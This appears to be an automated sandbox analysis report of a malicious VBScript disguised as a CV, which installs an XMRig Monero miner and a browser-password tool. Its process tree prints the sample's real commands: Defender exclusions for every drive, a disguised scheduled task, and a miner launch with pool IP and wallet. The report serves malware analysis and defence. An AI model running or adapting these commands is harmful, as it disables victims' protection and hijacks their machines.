Edit tour

Windows Analysis Report
curriculum_vitae-copie.vbs

Overview

General Information

Sample Name:	curriculum_vitae-copie.vbs
Analysis ID:	882715
MD5:	f72b1d9e4780f7b1b63fc2e2e88f1593
SHA1:	95f3a182de433dac071eb353f1abd50b8643aabe
SHA256:	4a346ad97d3b8093e61c3a0ab67a1a6611fb5c399725eea10becbdd0f331ee13
Tags:	vbs
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

VBScript performs obfuscated calls to suspicious functions

System process connects to network (likely due to code injection or exploit)

Antivirus detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Xmrig cryptocurrency miner

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Sigma detected: Register Wscript In Run Key

Multi AV Scanner detection for dropped file

Sigma detected: Xmrig

Wscript called in batch mode (surpress errors)

Found strings related to Crypto-Mining

Wscript starts Powershell (via cmd or directly)

Query firmware table information (likely to detect VMs)

Potential malicious VBS script found (suspicious strings)

Sample is not signed and drops a device driver

Queries sensitive share information (via WMI, WIN32_SHARE, often done to detect sandboxes)

Deletes itself after installation

Adds a directory exclusion to Windows Defender

Uses schtasks.exe or at.exe to add and modify task schedules

Potential evasive VBS script found (sleep loop)

Potential malicious VBS script found (has network functionality)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Yara detected WebBrowserPassView password recovery tool

Queries sensitive share information (via WMI, Win32_Share, often done to detect virtual machines)

Machine Learning detection for dropped file

Drops PE files to the user root directory

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Java / VBScript file with very long strings (likely obfuscated code)

Drops PE files

Uses a known web browser user agent for HTTP communication

Creates driver files

Drops PE files to the user directory

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Yara signature match

PE file contains sections with non-standard names

Found potential string decryption / allocating functions

Contains functionality to communicate with device drivers

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Enables debug privileges

PE file contains an invalid checksum

Enables security privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

System is w10x64

wscript.exe (PID: 3484 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\curriculum_vitae-copie.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

wscript.exe (PID: 6984 cmdline: C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\curriculum_vitae-copie.vbs MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

cmd.exe (PID: 7080 cmdline: C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l: MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 7028 cmdline: powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:" MD5: 95000560239032BC68B4C2FDFCDEF913)

7g.exe (PID: 5428 cmdline: C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z MD5: F7D5BA4EC2A88F2FF1F0ABEC61108A0B)

conhost.exe (PID: 4384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5724 cmdline: C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 6028 cmdline: schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

wscript.exe (PID: 5244 cmdline: "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

wscript.exe (PID: 4860 cmdline: wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

mservice.exe (PID: 3476 cmdline: "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title MD5: CFC0000B993A31C11EF58AC53837E4E1)

conhost.exe (PID: 3536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

wscript.exe (PID: 4620 cmdline: "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

wscript.exe (PID: 6596 cmdline: "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

wscript.exe (PID: 6548 cmdline: "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

wscript.exe (PID: 6712 cmdline: "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

wscript.exe (PID: 6860 cmdline: "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\WindowsUpdate\mservice.vbs	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth (Nextron Systems)	0x440:$s02: --donate-level=0
C:\Users\Public\WindowsUpdate\WinRing0x64.sys	PUA_VULN_Driver_OpenLibSysorg_WinRingsys_WinRing_7Q9n	Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 0c0195c48b6b8582fa6f6373032118da.bin, 27bcbeec8a466178a6057b64bef66512.bin	Florian Roth	0x1789:$: 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30 0x1749:$: 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4F 00 70 00 65 00 6E 00 4C 00 69 00 62 00 53 00 79 00 73 00 2E 00 6F 00 72 00 67 0x17c5:$: 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 31 00 2E 00 32 00 2E 00 30 00 2E 00 35 0x1949:$: 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 31 00 2E 00 32 00 2E 00 30 00 2E 00 35 0x17f5:$: 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30 00 2E 00 73 00 79 00 73 0x1915:$: 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30 0x18d1:$: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30 00 2E 00 73 00 79 00 73 0x1831:$: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 30 ...
C:\Users\Public\WindowsUpdate\ps.exe	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
C:\Users\Public\WindowsUpdate\mservice.exe	XMRIG_Monero_Miner	Detects Monero mining software	Florian Roth (Nextron Systems)	0x427fc0:$s1: 'h' hashrate, 'p' pause, 'r' resume 0x422176:$s2: --cpu-affinity 0x422190:$s3: set process affinity to CPU core(s), mask 0x3 for cores 0 and 1 0x421a68:$s4: password for mining server
C:\Users\Public\WindowsUpdate\mservice.exe	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth (Nextron Systems)	0x422235:$s01: --cpu-priority= 0x421b8d:$s05: --nicehash
C:\Users\Public\WindowsUpdate\mservice.exe	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth (Nextron Systems)	0x427ab8:$x1: donate.ssl.xmrig.com 0x427fb1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
C:\Users\Public\WindowsUpdate\mservice.exe	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Users\Public\WindowsUpdate\mservice.exe	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4285b0:$s1: %s/%s (Windows NT %lu.%lu 0x429660:$s3: \\.\WinRing0_ 0x423430:$s4: pool_wallet 0x41f288:$s5: cryptonight 0x41f298:$s5: cryptonight 0x41f2a8:$s5: cryptonight 0x41f2b8:$s5: cryptonight 0x41f2d0:$s5: cryptonight 0x41f2e0:$s5: cryptonight 0x41f2f0:$s5: cryptonight 0x41f308:$s5: cryptonight 0x41f318:$s5: cryptonight 0x41f330:$s5: cryptonight 0x41f348:$s5: cryptonight 0x41f358:$s5: cryptonight 0x41f368:$s5: cryptonight 0x41f378:$s5: cryptonight 0x41f390:$s5: cryptonight 0x41f3a8:$s5: cryptonight 0x41f3b8:$s5: cryptonight 0x41f3c8:$s5: cryptonight
Click to see the 3 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000011.00000002.868028749.0000022E67CE5000.00000004.00000020.00020000.00000000.sdmp	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth (Nextron Systems)	0x3810:$s02: --donate-level=0
00000013.00000002.992637368.000001854050B000.00000004.00000020.00020000.00000000.sdmp	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth (Nextron Systems)	0x67f9:$s02: --donate-level=0
0000000B.00000003.815621184.0000000001480000.00000004.00001000.00020000.00000000.sdmp	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth (Nextron Systems)	0x440:$s02: --donate-level=0
00000019.00000003.898659213.000001FFE094A000.00000004.00000020.00020000.00000000.sdmp	webshell_asp_sql	ASP webshell giving SQL access. Might also be a dual use tool.	Arnim Rupp	0x3e76:$sql3: System 0x10c16:$sql3: System 0x3004:$sql7: Open 0xfda4:$sql7: Open 0x4040:$o_sql2: CreateObject 0x10de0:$o_sql2: CreateObject 0x309e:$o_sql3: open 0xfe3e:$o_sql3: open 0x4040:$a_sql3: CreateObject 0x10de0:$a_sql3: CreateObject 0x2f4c:$a_sql4: createobject 0x2fbe:$a_sql4: createobject 0xfcec:$a_sql4: createobject 0xfd5e:$a_sql4: createobject 0x309e:$a_sql5: open 0xfe3e:$a_sql5: open 0x309e:$c_sql3: open 0xfe3e:$c_sql3: open 0x1c70:$sus5: cmd.exe 0x6224:$tagasp_short1: <%\x11 0x2746:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000018.00000002.898732843.000001DBC7705000.00000004.00000020.00020000.00000000.sdmp	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth (Nextron Systems)	0x3580:$s02: --donate-level=0
00000017.00000003.880754735.000001E320A92000.00000004.00000020.00020000.00000000.sdmp	webshell_asp_sql	ASP webshell giving SQL access. Might also be a dual use tool.	Arnim Rupp	0xeae:$sql3: System 0xbae6:$sql3: System 0x193e6:$sql3: System 0x9fa2:$sql4: Data 0x3c:$sql7: Open 0xac74:$sql7: Open 0x18574:$sql7: Open 0x1078:$o_sql2: CreateObject 0xbcb0:$o_sql2: CreateObject 0x195b0:$o_sql2: CreateObject 0xd6:$o_sql3: open 0xad0e:$o_sql3: open 0x1860e:$o_sql3: open 0x1078:$a_sql3: CreateObject 0xbcb0:$a_sql3: CreateObject 0x195b0:$a_sql3: CreateObject 0xabbc:$a_sql4: createobject 0xac2e:$a_sql4: createobject 0x184bc:$a_sql4: createobject 0x1852e:$a_sql4: createobject 0xd6:$a_sql5: open
00000016.00000002.880872368.000001959AF15000.00000004.00000020.00020000.00000000.sdmp	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth (Nextron Systems)	0x3860:$s02: --donate-level=0
00000013.00000002.992637368.0000018540500000.00000004.00000020.00020000.00000000.sdmp	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth (Nextron Systems)	0x363c:$s02: --donate-level=0
00000019.00000003.898567720.000001FFE0943000.00000004.00000020.00020000.00000000.sdmp	webshell_asp_sql	ASP webshell giving SQL access. Might also be a dual use tool.	Arnim Rupp	0x58e:$sql3: System 0xae76:$sql3: System 0x17c16:$sql3: System 0xa004:$sql7: Open 0x16da4:$sql7: Open 0x758:$o_sql2: CreateObject 0xb040:$o_sql2: CreateObject 0x17de0:$o_sql2: CreateObject 0xa09e:$o_sql3: open 0x16e3e:$o_sql3: open 0x758:$a_sql3: CreateObject 0xb040:$a_sql3: CreateObject 0x17de0:$a_sql3: CreateObject 0x9f4c:$a_sql4: createobject 0x9fbe:$a_sql4: createobject 0x16cec:$a_sql4: createobject 0x16d5e:$a_sql4: createobject 0xa09e:$a_sql5: open 0x16e3e:$a_sql5: open 0xa09e:$c_sql3: open 0x16e3e:$c_sql3: open
00000019.00000003.898525051.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp	webshell_asp_sql	ASP webshell giving SQL access. Might also be a dual use tool.	Arnim Rupp	0x958e:$sql3: System 0x13e76:$sql3: System 0x20c16:$sql3: System 0x871c:$sql7: Open 0x13004:$sql7: Open 0x1fda4:$sql7: Open 0x9758:$o_sql2: CreateObject 0x14040:$o_sql2: CreateObject 0x20de0:$o_sql2: CreateObject 0x87b6:$o_sql3: open 0x1309e:$o_sql3: open 0x1fe3e:$o_sql3: open 0x9758:$a_sql3: CreateObject 0x14040:$a_sql3: CreateObject 0x20de0:$a_sql3: CreateObject 0x8664:$a_sql4: createobject 0x86d6:$a_sql4: createobject 0x12f4c:$a_sql4: createobject 0x12fbe:$a_sql4: createobject 0x1fcec:$a_sql4: createobject 0x1fd5e:$a_sql4: createobject
00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth (Nextron Systems)	0x90ef8:$sa1: stratum+tcp://
00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth (Nextron Systems)	0xe1035:$s01: --cpu-priority= 0xe098d:$s05: --nicehash
00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp	XMRIG_Monero_Miner	Detects Monero mining software	Florian Roth (Nextron Systems)	0x427fc0:$s1: 'h' hashrate, 'p' pause, 'r' resume 0x422176:$s2: --cpu-affinity 0x422190:$s3: set process affinity to CPU core(s), mask 0x3 for cores 0 and 1 0x421a68:$s4: password for mining server
0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth (Nextron Systems)	0x422235:$s01: --cpu-priority= 0x421b8d:$s05: --nicehash
0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth (Nextron Systems)	0x427ab8:$x1: donate.ssl.xmrig.com 0x427fb1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4285b0:$s1: %s/%s (Windows NT %lu.%lu 0x429660:$s3: \\.\WinRing0_ 0x423430:$s4: pool_wallet 0x41f288:$s5: cryptonight 0x41f298:$s5: cryptonight 0x41f2a8:$s5: cryptonight 0x41f2b8:$s5: cryptonight 0x41f2d0:$s5: cryptonight 0x41f2e0:$s5: cryptonight 0x41f2f0:$s5: cryptonight 0x41f308:$s5: cryptonight 0x41f318:$s5: cryptonight 0x41f330:$s5: cryptonight 0x41f348:$s5: cryptonight 0x41f358:$s5: cryptonight 0x41f368:$s5: cryptonight 0x41f378:$s5: cryptonight 0x41f390:$s5: cryptonight 0x41f3a8:$s5: cryptonight 0x41f3b8:$s5: cryptonight 0x41f3c8:$s5: cryptonight
Process Memory Space: 7g.exe PID: 5428	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth (Nextron Systems)	0x8a8b9:$sa1: stratum+tcp:// 0x8a901:$sa1: stratum+tcp://
Process Memory Space: 7g.exe PID: 5428	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth (Nextron Systems)	0x8fd15:$s01: --cpu-priority= 0x9c6c:$s02: --donate-level=0 0x8f716:$s05: --nicehash
Process Memory Space: 7g.exe PID: 5428	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: 7g.exe PID: 5428	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: wscript.exe PID: 4860	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth (Nextron Systems)	0x15be:$s02: --donate-level=0 0x16a3:$s02: --donate-level=0 0x6535:$s02: --donate-level=0 0x661a:$s02: --donate-level=0 0x9aa8:$s02: --donate-level=0 0xac40:$s02: --donate-level=0 0xb1e7:$s02: --donate-level=0 0xb51a:$s02: --donate-level=0 0xc062:$s02: --donate-level=0 0xe3c3:$s02: --donate-level=0 0xe4e1:$s02: --donate-level=0 0xfa23:$s02: --donate-level=0 0x1450d:$s02: --donate-level=0 0x1462b:$s02: --donate-level=0 0x1565d:$s02: --donate-level=0 0x159f4:$s02: --donate-level=0 0x15ad9:$s02: --donate-level=0 0x16074:$s02: --donate-level=0 0x16159:$s02: --donate-level=0 0x16cc7:$s02: --donate-level=0 0x17262:$s02: --donate-level=0
Process Memory Space: mservice.exe PID: 3476	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth (Nextron Systems)	0x66879:$sa1: stratum+tcp:// 0x668c1:$sa1: stratum+tcp://
Process Memory Space: mservice.exe PID: 3476	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth (Nextron Systems)	0x6bcdd:$s01: --cpu-priority= 0x578e:$s02: --donate-level=0 0x589f:$s02: --donate-level=0 0x77594:$s02: --donate-level=0 0x77839:$s02: --donate-level=0 0x6b6de:$s05: --nicehash
Process Memory Space: mservice.exe PID: 3476	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: wscript.exe PID: 4620	webshell_asp_sql	ASP webshell giving SQL access. Might also be a dual use tool.	Arnim Rupp	0x42a7:$sql3: System 0x49b3:$sql3: System 0x18a5e:$sql3: System 0x1dbc0:$sql3: System 0x1832d:$sql7: Open 0x1d48f:$sql7: Open 0x4374:$o_sql2: CreateObject 0x18b23:$o_sql2: CreateObject 0x1c678:$o_sql2: CreateObject 0x1dc85:$o_sql2: CreateObject 0x1837a:$o_sql3: open 0x1d4dc:$o_sql3: open 0x4374:$a_sql3: CreateObject 0x18b23:$a_sql3: CreateObject 0x1c678:$a_sql3: CreateObject 0x1dc85:$a_sql3: CreateObject 0x182d1:$a_sql4: createobject 0x1830a:$a_sql4: createobject 0x1d433:$a_sql4: createobject 0x1d46c:$a_sql4: createobject 0x1837a:$a_sql5: open
Process Memory Space: wscript.exe PID: 6596	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth (Nextron Systems)	0x67f7:$s02: --donate-level=0 0x6d92:$s02: --donate-level=0 0xea8f:$s02: --donate-level=0 0xeb80:$s02: --donate-level=0 0xffb0:$s02: --donate-level=0 0x1028d:$s02: --donate-level=0 0x10378:$s02: --donate-level=0 0x11308:$s02: --donate-level=0 0x113f9:$s02: --donate-level=0 0x12547:$s02: --donate-level=0 0x14ec9:$s02: --donate-level=0 0x14fba:$s02: --donate-level=0 0x1606b:$s02: --donate-level=0 0x20f2d:$s02: --donate-level=0 0x21018:$s02: --donate-level=0 0x23064:$s02: --donate-level=0 0x23369:$s02: --donate-level=0 0x247c5:$s02: --donate-level=0
Process Memory Space: wscript.exe PID: 6548	webshell_asp_sql	ASP webshell giving SQL access. Might also be a dual use tool.	Arnim Rupp	0x6f6:$sql3: System 0x86c:$sql3: System 0xe4c:$sql3: System 0x2fdc:$sql3: System 0x70fe:$sql3: System 0x9936:$sql3: System 0xcc58:$sql3: System 0xe436:$sql3: System 0xfc22:$sql3: System 0x11015:$sql3: System 0x5a0d:$sql4: Data 0x806d:$sql4: Data 0x16f5b:$sql4: Data 0xb16:$sql7: Open 0x28ab:$sql7: Open 0x69cd:$sql7: Open 0x9205:$sql7: Open 0xc527:$sql7: Open 0xf4f1:$sql7: Open 0x108e4:$sql7: Open 0x90a:$o_sql2: CreateObject
Process Memory Space: wscript.exe PID: 6712	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth (Nextron Systems)	0x5bc1:$s02: --donate-level=0 0xeaf6:$s02: --donate-level=0 0xfe27:$s02: --donate-level=0 0x126bd:$s02: --donate-level=0 0x1313d:$s02: --donate-level=0 0x13444:$s02: --donate-level=0 0x14238:$s02: --donate-level=0 0x14d61:$s02: --donate-level=0 0x18487:$s02: --donate-level=0 0x19999:$s02: --donate-level=0 0x1b01a:$s02: --donate-level=0 0x1b5b5:$s02: --donate-level=0 0x1e079:$s02: --donate-level=0
Process Memory Space: wscript.exe PID: 6860	webshell_asp_sql	ASP webshell giving SQL access. Might also be a dual use tool.	Arnim Rupp	0x32ab:$sql3: System 0x56df:$sql3: System 0x656a:$sql3: System 0x910e:$sql3: System 0x9273:$sql3: System 0x9844:$sql3: System 0xb471:$sql3: System 0xd46e:$sql3: System 0x10df8:$sql3: System 0x14551:$sql3: System 0x82f:$sql4: Data 0x2b7a:$sql7: Open 0x5e39:$sql7: Open 0x85a7:$sql7: Open 0x950e:$sql7: Open 0xad40:$sql7: Open 0xc62c:$sql7: Open 0xcd3d:$sql7: Open 0x106c7:$sql7: Open 0x14163:$sql7: Open 0x1580b:$sql7: Open
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.3.7g.exe.3a0ca00.3.raw.unpack	PUA_VULN_Driver_OpenLibSysorg_WinRingsys_WinRing_7Q9n	Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 0c0195c48b6b8582fa6f6373032118da.bin, 27bcbeec8a466178a6057b64bef66512.bin	Florian Roth	0x1789:$: 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30 0x1749:$: 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4F 00 70 00 65 00 6E 00 4C 00 69 00 62 00 53 00 79 00 73 00 2E 00 6F 00 72 00 67 0x17c5:$: 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 31 00 2E 00 32 00 2E 00 30 00 2E 00 35 0x1949:$: 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 31 00 2E 00 32 00 2E 00 30 00 2E 00 35 0x17f5:$: 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30 00 2E 00 73 00 79 00 73 0x1915:$: 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30 0x18d1:$: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30 00 2E 00 73 00 79 00 73 0x1831:$: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 30 ...
11.3.7g.exe.35b7600.1.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
11.3.7g.exe.35b7600.1.raw.unpack	XMRIG_Monero_Miner	Detects Monero mining software	Florian Roth (Nextron Systems)	0x3f09c0:$s1: 'h' hashrate, 'p' pause, 'r' resume 0x3eab76:$s2: --cpu-affinity 0x3eab90:$s3: set process affinity to CPU core(s), mask 0x3 for cores 0 and 1 0x3ea468:$s4: password for mining server
11.3.7g.exe.35b7600.1.raw.unpack	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth (Nextron Systems)	0x3eac35:$s01: --cpu-priority= 0x3ea58d:$s05: --nicehash
11.3.7g.exe.35b7600.1.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth (Nextron Systems)	0x3f04b8:$x1: donate.ssl.xmrig.com 0x3f09b1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
11.3.7g.exe.35b7600.1.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
11.3.7g.exe.35b7600.1.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
